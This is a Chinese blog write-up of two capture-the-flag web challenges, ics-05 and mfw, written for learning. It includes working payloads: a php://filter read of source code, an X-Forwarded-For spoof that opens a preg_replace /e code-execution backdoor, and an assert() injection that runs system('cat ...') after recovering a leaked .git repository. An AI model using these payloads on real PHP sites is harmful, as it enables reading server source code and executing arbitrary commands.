【ics-05 | mfw】攻防世界CTF题WP

最新推荐文章于 2022-06-15 14:54:43 发布
最新推荐文章于 2022-06-15 14:54:43 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: ctf 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/122513315
版权

攻防世界CTF题WP


  这几天在家想要学习一点ctf相关的知识,所以做一些题来研究一下,顺便也是让脑袋不过于迟钝了

ics-05

所需知识

  • 文件包含漏洞
  • php伪协议
  • php代码审计(preg_replace函数)

解题步骤

在这里插入图片描述

​  打开题目后是一个比较简单的系统界面,嗯,基本除了图片就只有设备维护中心这一个地方可以点击

  点击后是一个数据库展示的界面,不过重点不在数据库的展现,我们发现重新点击标题是url出现了变化

在这里插入图片描述
  发现有page参数的输入,我们可以使用php伪协议,输入相关的伪协议

php://filter/read=convert.base64-encode/resource=index.php

  输入伪协议在page参数后我们可以发现界面出现了base64编码,对它进行base64解码,可得这个index.php中本该有的源代码,发现比起网页源代码多了一些部分,其中最重要的是以下部分

(因为由题目知道这个是一个关于后台后门的题目)

<?php
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

?>

我们发现这个代码叙述了几个部分:

  • 当请求头中的X-Forwarded-For 参数为127.0.0.1时,进行这个if的判断
  • 我们输入三个参数,在这三个参数都确定存在的时候,进行preg_replace函数

我们将其作为突破口:

我们知道,在preg_place函数之中,如果pattern变量中带了/e后缀,replace变量里面就会将变量内内容当做php代码进行执行

所以我们使用burpsuite,在xff头是127.0.0.1的前提下,进行三个变量的注入
在这里插入图片描述
如此,我们就可以进行

  • find命令寻找flag文件地址
  • cat命令打开文件
    在这里插入图片描述
    在这里插入图片描述

最后这个flag文件中的flag值还是被注释了,我们需要直接看html文件

学习知识

php伪协议(文件包含漏洞中使用)

  php伪协议是php语言支持的协议和封装的协议,在web渗透漏洞利用中常用于配合文件包含进行web攻击,从而获取网站权限

  也就是说我们如果想要进行http请求,我们可以直接使用php的相关协议,因为php语言已经写好了关于http请求的内容编写好了

file:// 	— 访问本地文件系统
http://		 — 访问 HTTP(s) 网址
ftp:// 		— 访问 FTP(s) URLs
php:// 		— 访问各个输入/输出流(I/O streams)
zlib:// 	— 压缩流
data:// 	— 数据(RFC 2397)
glob:// 	— 查找匹配的文件路径模式
phar:// 	— PHP 归档
ssh2:// 	— Secure Shell 2
rar:// 		— RAR
ogg:// 		— 音频流
expect:// 	— 处理交互式的流

我们在这题中的访问本地文件的payload:

?page=php://filter/read=convert.base64-encode/resource=index.php

php://filter/							#一种php的伪协议
/read=convert.base64-encode/		#表示读取的方式是base64编码
resource=index.php						#表示目标文件为index.php

preg_place函数

preg_place函数是php中的一个函数,函数原型如下

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

实际操作来说的话:

preg_replace("/[0-9]/","",$str);           //去掉0-9字符,此时相当于 replace的功能, 
preg_replace("/0/","A",$str);                //将0变成A的意思

在php5.5到php5.6的版本中:

  • /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
  • 提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

所以我们在使用了/e 后在payload里面相当于就是以eval函数的形式进行了php代码的执行,得到了相关的结果。

mfw

所需知识

  • Git代码泄露、GitHack的使用
  • php代码审计(assert函数)
  • dirsearch或者御剑的使用(可有可无)

解题步骤

打开题目后是一个简陋的网站

在这里插入图片描述
我们进行点击,发现没什么东西,在源代码中发现有一个被注释掉的源码

在这里插入图片描述
但是点击一看,什么都没有,还是找其他的吧

我们发现在about界面,存在线索

在这里插入图片描述
所以我们进行猜测,可能是Git源码泄露

我们使用dirsearch来进行探测Web目录

在这里插入图片描述
可以确定确实是有git源码的泄露,我们进入那个url

在这里插入图片描述
然后使用GitHack进行漏洞利用

在这里插入图片描述
在这里插入图片描述
  点开templates中间发现有一个flag.php,但是这个文件里面是没有flag的,所以我们寻思是不是因为这个Git不是现在在服务器中的完整代码,那我们再看看index.php

可以关注的源码如下:

 <?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

  我们发现了assert函数,我们知道这个assert函数和之前的preg_replace函数一样,是一个可以对字符串的php代码进行使用的函数,并且是可以通过构造payload来实现的。

我们的payload是

?page=') or system("cat ./templates/flag.php"); //

将其输入url后,在源代码部分就可以看到结果。

在这里插入图片描述

学习知识

Dirserach工具

是一个类似于御剑的web目录检测工具,可以用来进行目录的检测,区别在于这个目录是用的命令行形式

并且感觉要更加详细一点

在这里插入图片描述

GitHack

  当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。

  Git信息泄露的危害很大,渗透测试人员、攻击者,可直接从源码获取敏感配置信息(如:邮箱,数据库),也可以进一步审计代码,挖掘文件上传、SQL注射等安全漏洞。

  GitHack是一个.git泄露利用测试脚本,通过泄露的文件,还原重建工程源代码。

assert函数

一个php中的漏洞执行函数,有一点像是eval函数一样

ethanyi9
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF攻防世界 ics-06 解详析
等风来
05-20 3604
目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,留下了入侵者的痕迹。仅栏能打开新窗口:注意到URL栏的id参数,对id进行爆破。
XCTF训练之ics-05
RoboTerh的博客
08-05 235
XCTF ics-05 打开目,我们发现只有“设备维护中心”可以进入 又发现点击“云平台设备维护中心”页面多了indexurl中多了page=index 查看源码,发现没有什么有用的东西 想到通过php伪协议获取index.php的源码不懂PHP伪协议点我!! payload:?php://filter/convert.base64-encode/resource=index.php 得到源码: base64解码后得到关键php代码: <?php error_reporting(0); @s
攻防世界-web-mfw
wallacegen的博客
11-18 294
开始没有什么思路,参考网上别人的wp,首先提到的一个点就是源码泄漏 摘自https://lddp.github.io/2018/05/10/WEB-%E6%BA%90%E7%A0%81%E6%B3%84%E6%BC%8F/ 关于源码泄漏,这位师傅已经总结了。 然后是git源码泄漏,用GitHack-master下载下来之后,可以看到源码。 先来看index.php <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else {
CTF一些入门目的wp(一)
qq_41788666的博客
05-25 1645
1. XSS注入测试 目链接(http://103.238.227.13:10089)        进入网页后发现        由目原先的提示得知注入点为id(GET方法),查看网页源代码,发现如下代码         猜测应该是将s赋值为用户传上去的id的值        innerHTML无法执行进来的script  可以构造img标签来使script执行        测试一波:ht...
记xctf_web ics-05
fly夏天的博客
09-23 558
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
peach-pit-mfwMFW第一天示例
02-25
HTML文件通常以`.html`或`.htm`为扩展名,因此在"peach-pit-mfw-main"这个压缩包中,可能包含一个或多个这样的文件,它们可能是已经编写好的HTML示例,供学习者参考和分析。通过查看和编辑这些文件,你可以了解到...
Python库 | mfw-template-0.1b2.tar.gz
05-17
资源分类:Python库 所属语言:Python 资源全名:mfw-template-0.1b2.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
mfw-bootstrap
04-02
在压缩包文件"mfw-bootstrap-main"中,我们可以期待找到以下关键文件和目录: 1. **index.html** - 这通常是项目的主入口文件,展示了如何引入和使用Bootstrap模板及组件。 2. **css** - 包含自定义CSS样式文件,...
mfw-portfolio:移动友好投资组合决赛'20
03-31
"mfw-portfolio:移动友好投资组合决赛'20"是一个项目,主要关注于创建一个适应移动设备的投资组合页面,这在当前移动优先的互联网环境中至关重要。该项目可能旨在展示参赛者在网页设计和开发,尤其是CSS(层叠样式表...
大华DH-IPC-F715P 升级程序V1.013不支持ONVIF协议
06-09
"大华DH-IPC-F715P 升级程序V1.013不支持ONVIF协议" 指的是针对大华DH-IPC-F715P型号的网络摄像头的一个特定版本的固件升级。这个版本的升级程序(V1.013)不包含对ONVIF(开放网络视频接口论坛)协议的支持。...
XCTF-攻防世界CTF平台-Web类——17、ics-05php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 2868
查看目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
web萌新ctf练习--攻防世界--mfw
qq_31677377的博客
06-04 1128
web萌新ctf练习–攻防世界mfw 目没有给hint 打开网页 习惯的查看源代码,发现一个可以的连接?page=flag 打开这个网页,是个空的。然后再在网页上点啊点,在about页面下发现了一些信息,可能存在git信息泄露 尝试输入/.git/,果然有东西 然后用Githack工具,拉下网站源码 依次点开各个php,没有直接写有flag的信息。再回头看index.php ...
攻防世界web进阶区ics-05
gongjingege的博客
07-29 387
打开链接 看了看源代码,没发现啥,页面到处点点,只有设备维护中心可以进去 再点了一下云平台设备维护中心,发现url栏?page=index url栏看见page,考虑文件包含漏洞 读取index的源代码,参考大佬的wp,用php伪协议php://filter payload:?page=php://filter/read=convert.base64-encode/resource=index.php 得到一段base64,解码 https://tool.chinaz.com/tools/base64.
记一道国外ctf杂项
沐一 · 林 的博客
07-28 222
python3中通过类函数调用全局变量flag句柄 目源码(本地调试要自己创建flag.txt): #!/usr/bin/env python3 art = ''' 88 ,d 88 88 88 ,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba,
攻防世界-ics-05-(详细操作)做笔记
qq_43715020的博客
06-15 1541
攻防世界-ics-05-(详细操作)做笔记
攻防世界XCTFmfw
末初的CSDN博客
03-07 447
发现使用git进行网站部署,尝试 /.git查看是否git泄漏。 git泄漏 当前大量开发人员使用git进行版本控制,对站点自动部署。 如果配置不当,可能会将.git文件夹直接部署到线上环境,这就引起了git泄露漏洞。 GitHack 项目地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还...
从CSAW CTF 2016 mfw(深入理解assert+strops)
T19er的博客
07-08 1446
从一道ctf(CSAW CTF 2016 mfw)深入学习assert+strops 从git源码泄露入手,查看源码可知page没有做任何过滤 <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".ph...
XCTF-攻防世界CTF平台-Web类——19、mfw(.Git源代码泄露、php的assert断言)
Onlyone_1314的博客
12-11 3690
打开目地址: 是一个作者用php写的网站 在About页面,作者介绍他使用了Git、PHP、Bootstrap 之后我们查看页面源代码: 在每个页面的注释里都有一个隐藏页面:?page=flag,提示flag应该就在这个页面。我们也注意到home、contact和about页面都是通过访问index.php页面以GET方式的page参数来跳转页面的:?page=home、?page=contact、?page=about。 所以我们直接访问: http://111.200.241.244:60434
攻防世界 mfw思路
xj28555的博客
08-01 624
首先进入目 点击about 发现一个.git,看看是否存在git源码泄露,我们访问.git文件一下。 发现访问到,那么我们可以用githack把源代码给下到本地来进行代码审计。 发现一个index.php我们点击进入进行代码审计 发现page参数没有任何过滤 assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。 如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。 assertion 是字符
度为2的有序树就是二叉树
最新发布
09-01
度为2的有序树与二叉树有一些区别。首先,度为2的有序树至少有3个结点,而二叉树可以为空。其次,度为2的有序树中,孩子结点的左右次序是相对于另一个孩子结点而言的。如果某个结点只有一个孩子,则无需区分其左右次序。而对于二叉树,无论其孩子数是否为2,都需要确定其左右次序,即二叉树的结点次序是确定的,不是相对于另一个结点而言的。此外,含有n个结点的二叉树的高度为log2n下取整。 虽然度为2的有序树和二叉树在一些方面有差异,但可以说度为2的有序树就是二叉树。因为对于任何一棵二叉树,我们都可以认为它是一个度为2的有序树,只是其中一些结点的孩子数可能为0或者1。而完全二叉树是一种特殊的二叉树,它满足每个结点都与高度为h的满二叉树中编号为1—n的结点一一对应的条件。在完全二叉树中,如果一个结点没有左孩子,则它必定没有右孩子,那它就是叶子结点。 综上所述,度为2的有序树可以看作是一种特殊的二叉树。它们的区别在于度为2的有序树中孩子结点的左右次序相对于另一个孩子而言,而二叉树的结点次序是确定的。然而,我们可以将任何一棵二叉树视为度为2的有序树,只需将孩子数为0或1的结点视为度为2的结点即可。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [数据结构---第五章树与二叉树---二叉树的概念---选择](https://blog.csdn.net/programmer9/article/details/125015325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [第六章 树和二叉树习1](https://download.csdn.net/download/MFW333/87596042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值